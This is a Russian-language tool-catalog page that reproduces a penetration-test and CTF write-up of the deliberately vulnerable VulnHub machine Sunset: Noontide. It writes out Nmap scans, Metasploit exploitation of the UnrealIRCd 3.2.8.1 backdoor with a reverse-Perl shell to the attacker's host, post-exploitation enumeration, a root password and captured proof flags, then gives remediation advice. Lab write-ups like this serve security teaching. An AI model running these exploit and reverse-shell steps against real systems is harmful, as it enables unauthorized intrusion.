Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sunset-noontide-pentesting — Описание Профессиональная оценка пентеста машины Sunset: Noontide с VulnHub, охватывающая разведку, перечисление служб, эксплуатацию CVE-2010-2075, постэксплуатацию, повышение привилегий и полный захват системы. | Kitploit
Инструменты/GitHubGitHub/zales2004/sunset-noontide-pentesting
Повышение привилегийРазведкаСканирование портовАнализ уязвимостейЭксплуатацияПост-эксплуатацияСетевая безопасностьCTFТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Обучение и Образование
Red Teaming
Лаборатории и Практика
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Описание Профессиональная оценка пентеста машины Sunset: Noontide с VulnHub, охватывающая разведку, перечисление служб, эксплуатацию CVE-2010-2075, постэксплуатацию, повышение привилегий и полный захват системы.

Репозиторий
9 ч 7 мин назадЕщё не проверено

Sunset: Noontide — Тестирование на проникновение

Профессиональная оценка тестирования на проникновение и прохождение CTF машины Sunset: Noontide — намеренно уязвимой машины от VulnHub.

Этот проект документирует полный жизненный цикл тестирования на проникновение, включая разведку, перечисление сервисов, исследование уязвимостей, эксплуатацию, первоначальный доступ, постэксплуатацию, повышение привилегий, подтверждение компрометации, оценку рисков, сопоставление с MITRE ATT&CK и рекомендации по устранению.

⚠️ Отказ от ответственности: Данная оценка проводилась против намеренно уязвимой машины в авторизованной лабораторной среде. Описанные здесь методы и команды предназначены только для систем, на которые получено явное разрешение.


🎯 Цели

  • Идентифицировать целевой хост
  • Перечислить открытые сервисы
  • Определить уязвимое программное обеспечение и его версии
  • Исследовать применимые уязвимости
  • Проэксплуатировать уязвимый сервис
  • Получить первоначальный доступ к оболочке
  • Выполнить постэксплуатационное перечисление Linux
  • Определить возможности повышения привилегий
  • Получить доступ уровня root
  • Извлечь файлы подтверждения пользователя и root
  • Задокументировать обнаруженные проблемы безопасности
  • Предоставить рекомендации по устранению

🖥️ Лабораторная среда

КомпонентДетали
ЦельSunset: Noontide
ПлатформаVulnHub
IP цели10.106.186.186
Имя хоста целиnoontide
ОС целиDebian GNU/Linux 10 (Buster)
Архитектураx86_64
Платформа атакующегоKali Linux
IP атакующего10.106.186.204
Тип оценкиАвторизованная лабораторная оценка
Общий рискКРИТИЧЕСКИЙ
Результат оценкиПолная компрометация системы

🔐 Цепочка атаки

Обнаружение цели → Перечисление Nmap → Идентификация UnrealIRCd 3.2.8.1 → SearchSploit → Идентификация CVE-2010-2075 → Эксплуатация через Metasploit → Удалённая командная оболочка → Оболочка от имени server → Постэксплуатация Linux → Слабые учётные данные root → su root → UID 0 / Доступ root → Файлы подтверждения пользователя и root


1. Разведка

Первоначальное обнаружение сети было выполнено для идентификации уязвимой цели.

В конечном итоге цель была идентифицирована как:

10.106.186.186

В ходе разведки 10.106.186.142 был идентифицирован как шлюз по умолчанию, а не как предполагаемая цель.

Это подчёркивает важность правильной идентификации цели перед проведением дальнейшего тестирования безопасности, особенно в мостовой или общей лабораторной сети.


2. Перечисление сервисов

Обнаружение сервисов и версий с помощью Nmap было выполнено против цели с использованием:

nmap -sV 10.106.186.186

Значимым открытым сервисом, обнаруженным в ходе оценки, был:

6667/tcp open irc UnrealIRCd

Затем было выполнено более детальное сканирование с использованием:

nmap -sC -sV -Pn -p 6667 10.106.186.186

Сервис был идентифицирован как:

UnrealIRCd 3.2.8.1

IRC-сервис также сообщил:

irc.foonet.com

Открытый сервис UnrealIRCd стал основной поверхностью атаки, исследованной в ходе оценки.


3. Исследование уязвимостей

SearchSploit был использован для исследования публично задокументированных уязвимостей, связанных с обнаруженной версией UnrealIRCd.

Команда:

searchsploit UnrealIRCd 3.2.8.1

Соответствующий результат:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

Уязвимость была идентифицирована как:

CVE-2010-2075

Уязвимость

Выполнение команд через бэкдор в UnrealIRCd 3.2.8.1

Критичность

Критическая

Тип атаки

Удалённое выполнение команд

Влияние на безопасность

Успешная эксплуатация уязвимого сервиса позволяет атакующему удалённо выполнять команды в целевой системе.


4. Эксплуатация через Metasploit

Уязвимый IRC-сервис был проэксплуатирован с использованием Metasploit Framework.

Выбранный модуль:

exploit/unix/irc/unreal_ircd_3281_backdoor

Пример конфигурации:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

Первоначальные попытки с полезной нагрузкой не дали рабочей сессии.

Впоследствии была выбрана совместимая обратная полезная нагрузка Unix reverse-Perl:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit сообщил, что цель выглядит уязвимой, и успешно открыл сессию командной оболочки.


5. Первоначальный доступ

Полученная оболочка была проверена с помощью:

whoami

Результат:

server

Это подтвердило успешное удалённое выполнение команд от имени учётной записи server.

Начальный рабочий каталог:

/home/server/irc/Unreal3.2

На этом этапе оценка перешла от удалённой эксплуатации сервиса к локальному постэксплуатационному перечислению.


6. Постэксплуатационное перечисление

После получения оболочки было выполнено стандартное перечисление Linux для понимания скомпрометированного хоста и выявления потенциальных путей повышения привилегий.

Текущий пользователь

Команда:

id

Результат:

uid=1000(server) gid=1000(server)

Учётная запись была непривилегированным пользователем.

Имя хоста

Команда:

hostname

Результат:

noontide

Информация о ядре

Команда:

uname -a

Результат:

Linux noontide 4.19.0-10-amd64 x86_64

Операционная система

Команда:

cat /etc/os-release

Результат:

Debian GNU/Linux 10 (buster)

Эти команды установили текущую личность, имя хоста, версию ядра, операционную систему и общую конфигурацию системы.


7. Перечисление для повышения привилегий

Было выполнено несколько стандартных проверок повышения привилегий в Linux.

7.1 Перечисление SUID

Команда:

find / -perm -4000 -type f 2>/dev/null

Были идентифицированы стандартные SUID-бинарники, такие как passwd, chsh, mount, umount, su, chfn, newgrp и gpasswd.

Очевидный пользовательский или аномальный SUID-бинарник, который стал бы успешным вектором повышения привилегий, идентифицирован не был.


7.2 Перечисление sudo

Команда:

sudo -l

Из доступного вывода не был идентифицирован полезный путь повышения привилегий через sudo.


7.3 Перечисление cron

Команды:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

Наблюдаемые запланированные задания были стандартными системными заданиями в стиле Debian.

Очевидное записываемое cron-задание root идентифицировано не было.


7.4 Перечисление записываемых файлов

Команда:

find / -writable -type f 2>/dev/null | head -100

Первоначальные результаты в основном представляли собой псевдофайлы /proc и не выявили практического вектора повышения привилегий.


7.5 Возможности Linux

Команда:

getcap -r / 2>/dev/null

Из полученного вывода полезное повышение привилегий на основе возможностей идентифицировано не было.


8. Повышение привилегий

Успешный путь повышения привилегий был основан на намеренно слабых учётных данных root, настроенных на уязвимой машине.

Доступ к учётной записи root был получен с помощью:

su root

Пароль:

root

Доступ root был затем проверен с помощью:

id

Результат:

uid=0(root) gid=0(root) groups=0(root)

Личность также была подтверждена с помощью:

whoami

Результат:

root

Это подтвердило полный административный контроль над целевой системой.


9. Подтверждение компрометации

9.1 Подтверждение уровня пользователя

Файл подтверждения уровня пользователя находился по пути:

/home/server/local.txt

Команда:

cat /home/server/local.txt

Результат:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Подтверждение уровня root

Файл подтверждения уровня root находился по пути:

/root/proof.txt

Команда:

cat /root/proof.txt

Результат:

ab28c8ca8da1b9ffc2d702ac54221105

Файл подтверждения root также содержал:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Извлечение обоих файлов подтверждения подтверждает успешную компрометацию от первоначального удалённого доступа до контроля уровня root.


10. Сводка рисков

IDОбнаружениеКритичностьВлияние
VULN-01Бэкдор в UnrealIRCd 3.2.8.1🔴 КритическаяУдалённое выполнение команд
VULN-02Слабые учётные данные root🔴 КритическаяПолная административная компрометация

11. Подробные обнаружения

VULN-01 — Бэкдор в UnrealIRCd 3.2.8.1

Критичность: Критическая

Затронутый сервис: IRC / TCP 6667

Затронутое ПО: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

Тип атаки: Удалённое выполнение команд

Наблюдаемое влияние: Получена удалённая оболочка от имени server

Описание

Открытый сервис UnrealIRCd работал в уязвимой версии, связанной с известной уязвимостью выполнения команд через бэкдор.

Уязвимость была идентифицирована посредством перечисления сервисов и исследования в SearchSploit и была успешно проэксплуатирована с помощью Metasploit.

Влияние на бизнес

Атакующий, способный достичь уязвимого IRC-сервиса, может удалённо выполнять команды и получать несанкционированный доступ к хосту.


VULN-02 — Слабые учётные данные root

Критичность: Критическая

Затронутая учётная запись: root

Наблюдаемые учётные данные: root / root

Наблюдаемое влияние: Административный доступ с UID 0

Описание

Учётная запись root была настроена с чрезвычайно слабыми учётными данными.

После получения локальной оболочки от имени server доступ к учётной записи root был получен с использованием слабых учётных данных и подтверждён с UID 0.

Влияние на бизнес

Атакующий, получивший локальный доступ к оболочке, может использовать слабые учётные данные root для получения полного контроля над операционной системой.


12. Сопоставление с MITRE ATT&CK


13. Рекомендации по устранению

13.1 Удалить или обновить UnrealIRCd

Замените уязвимую установку UnrealIRCd на доверенную и поддерживаемую версию.

Проверяйте целостность программного обеспечения и происхождение пакетов перед развёртыванием.

13.2 Удалить ПО с бэкдором

Если целостность или происхождение программного обеспечения неясны, пересоберите систему с использованием доверенных установочных носителей и проверенных пакетов.

13.3 Устранить слабые учётные данные

Замените учётные данные по умолчанию и слабые учётные данные на надёжные, уникальные административные учётные данные.

Не используйте простые пароли, такие как root.

13.4 Ограничить доступ к IRC

Если IRC необходим, ограничьте доступ с помощью:

  • Правил межсетевого экрана
  • Сегментации сети
  • Доступа через VPN
  • Ограничений по IP-адресу источника

13.5 Применять обновления безопасности

Поддерживайте документированный процесс управления исправлениями для операционной системы и всех открытых сервисов.

13.6 Мониторить привилегированный доступ

Регистрируйте и проверяйте:

  • Административную аутентификацию
  • Доступ root
  • Изменения привилегий
  • Подозрительную активность аутентификации

14. Методология тестирования на проникновение


15. Использованные инструменты

  • Nmap — Обнаружение сети и перечисление сервисов
  • SearchSploit — Исследование уязвимостей и эксплойтов
  • Metasploit Framework — Эксплуатация и установление сессии
  • Утилиты командной строки Linux — Постэксплуатация и перечисление привилегий

16. Продемонстрированные навыки

  • Сетевая разведка
  • Обнаружение хостов
  • Сканирование портов
  • Перечисление сервисов
  • Идентификация версий
  • Оценка уязвимостей
  • Исследование CVE
  • SearchSploit
  • Metasploit Framework
  • Удалённое выполнение команд
  • Перечисление Linux
  • Перечисление SUID
  • Перечисление sudo
  • Перечисление cron
  • Перечисление записываемых файлов
  • Возможности Linux
  • Оценка безопасности учётных данных
  • Повышение привилегий
  • Подтверждение компрометации
  • Сопоставление с MITRE ATT&CK
  • Оценка рисков
  • Отчётность по безопасности
  • Анализ устранения

17. Итоговая оценка

Хост Sunset: Noontide был успешно скомпрометирован от первоначального сетевого доступа до полного контроля уровня root.

Основной уязвимостью первоначального доступа был бэкдор в UnrealIRCd 3.2.8.1 (CVE-2010-2075).

Уязвимость обеспечила удалённое выполнение команд и привела к получению первоначальной оболочки от имени учётной записи server.

Затем было выполнено постэксплуатационное перечисление, включая проверки SUID, sudo, cron, записываемых файлов, возможностей Linux, личности, операционной системы и файловой системы.

Эти проверки не выявили успешного маршрута повышения привилегий.

Полный административный доступ был в конечном итоге достигнут благодаря слабым учётным данным root на машине.

Успешное извлечение обоих файлов подтверждения — уровня пользователя и уровня root — подтвердило полную компрометацию системы.

Итоговая оценка

КРИТИЧЕСКАЯ — Достигнута полная компрометация системы


18. Результаты оценки


19. Профессиональный отчёт о тестировании на проникновение

Подробный профессиональный отчёт о тестировании на проникновение включён в этот проект:

Sunset-Noontide-Penetration-Testing-Report.pdf

Отчёт содержит:

  • Резюме для руководства
  • Контроль документа
  • Область и правила взаимодействия
  • Сводка рисков
  • Путь атаки
  • Разведка
  • Перечисление сервисов
  • Исследование уязвимостей
  • Эксплуатация через Metasploit
  • Первоначальный доступ
  • Постэксплуатация
  • Повышение привилегий
  • Доказательства и файлы подтверждения
  • Подробные обнаружения
  • Сопоставление с MITRE ATT&CK
  • Рекомендации по устранению
  • Итоговая оценка

20. Доказательства

Предлагаемая структура репозитория:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

Скриншоты должны содержать только информацию из авторизованной лабораторной среды.


21. Извлечённые уроки

Данная оценка предоставила практический опыт в:

  1. Правильной идентификации предполагаемой цели в сетевой среде.
  2. Выполнении перечисления сервисов и версий с помощью Nmap.
  3. Исследовании уязвимостей с использованием SearchSploit.
  4. Выборе подходящего модуля эксплойта Metasploit.
  5. Устранении проблем совместимости полезных нагрузок.
  6. Установлении удалённой командной оболочки.
  7. Выполнении постэксплуатационного перечисления Linux.
  8. Систематической проверке распространённых векторов повышения привилегий.
  9. Идентификации слабых административных учётных данных.
  10. Проверке компрометации уровня root.
  11. Сборе доказательств компрометации.
  12. Документировании уязвимостей в профессиональном формате тестирования на проникновение.

22. ⚠️ Правовая и этическая оговорка

Этот репозиторий предназначен строго для:

  • Образования в области кибербезопасности
  • Авторизованного тестирования на проникновение
  • Практики CTF
  • Исследования уязвимостей
  • Лабораторных сред

Методы, описанные в этом репозитории, должны применяться только к системам, на которые получено явное разрешение.

Не используйте эти методы против производственных систем, публичной инфраструктуры или сторонних систем без разрешения.


👨‍💻 Автор

Alen Sales K S

Кибербезопасность | Тестирование на проникновение | SOC | Сетевая безопасность

GitHub: https://github.com/zales2004


⭐ Итог проекта

Sunset: Noontide демонстрирует полный рабочий процесс тестирования на проникновение:

Разведка → Перечисление → Исследование уязвимостей → Эксплуатация → Первоначальный доступ → Постэксплуатация → Повышение привилегий → Доступ root → Сбор доказательств → Оценка рисков → Отчётность по безопасности

Результат оценки: КРИТИЧЕСКАЯ — Достигнута полная компрометация системы

Скачать инструмент
ТехникаIDНаблюдаемая активность
Network Service ScanningT1046Перечисление Nmap
Exploit Public-Facing ApplicationT1190Эксплуатация открытого сервиса UnrealIRCd
Command and Scripting InterpreterT1059Удалённая командная оболочка
Valid AccountsT1078Использование учётных данных root
Account DiscoveryT1087Перечисление личности и пользователей
System Information DiscoveryT1082uname и /etc/os-release
File and Directory DiscoveryT1083Перечисление файловой системы
Scheduled Task/Job DiscoveryT1053Перечисление cron
Permission Groups DiscoveryT1069id и перечисление групп
ЭтапДействия
РазведкаОбнаружение сети и идентификация цели
ПеречислениеОбнаружение сервисов/версий с помощью Nmap
Исследование уязвимостейИдентификация модулей SearchSploit и Metasploit
ЭксплуатацияЭксплуатация бэкдора UnrealIRCd
Первоначальный доступКомандная оболочка от имени server
ПостэксплуатацияПеречисление личности, ОС, файловой системы и привилегий
Повышение привилегийПроверки SUID, sudo, cron, записываемых файлов и возможностей
Сбор доказательствФайлы подтверждения пользователя и root
ОтчётностьОбнаружения, анализ рисков и устранение
ЦельСтатус
Цель идентифицирована✅ PASS
Открытый сервис идентифицирован✅ PASS
Уязвимая версия идентифицирована✅ PASS
CVE идентифицирована✅ PASS
Удалённое выполнение команд✅ PASS
Первоначальная оболочка от имени server✅ PASS
Подтверждение пользователя извлечено✅ PASS
Повышение привилегий✅ PASS
Доступ root подтверждён✅ PASS
Подтверждение root извлечено✅ PASS